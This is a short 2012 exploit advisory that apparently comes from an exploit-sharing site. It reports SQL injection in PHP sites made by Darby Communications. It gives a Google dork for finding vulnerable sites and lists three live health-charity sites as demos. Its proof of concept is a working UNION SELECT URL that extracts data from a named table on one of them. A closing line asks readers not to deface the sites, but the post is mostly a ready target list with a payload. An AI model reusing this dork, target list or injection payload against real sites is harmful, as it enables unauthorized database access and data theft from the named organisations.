==========================================================================
<<<:>>> Darby Communications - SQL Injection Vulnerability <<:>>>
==========================================================================
Title: Darby Communications - SQL Injection Vulnerability
Author : D0m12
Date: 29/05/2012
Google Dork--> intext:"site by darby communications" inurl:.php?id=
Vendor Link: http://darbyfilms.com
Tested On: Win 7
Contact : d0m1265@yahoo.com
[+]Demos
http://www.cervicalcanceraction.org/news/news-detail.php?id=30'
http://www.newtbdrugs.org/project.php?id=135'
http://preventb.org/portfolio/news.php?id=17'
[+]Info
Part of Page don't load up properly after adding ' demostrating and sql injection vulnerablity
[+]PoC
Here i extracted details in the title column
http://www.cervicalcanceraction.org/news/news-detail.php?id=-30+UnIoN+select+1,2,GrOUp_COnCaT(title),4,5,6+from+ccatest.events--
SpeCial Appeal to REaders:
Please don't not deface or hack these site.I just posted so that they can fixed asap.
M0rE @ Google
Hope they fix their shit sOOn
Njoy!!!!!!
#########################################################################
Greetz To :
All My Friends From ABH & to All those who know me:)
#########################################################################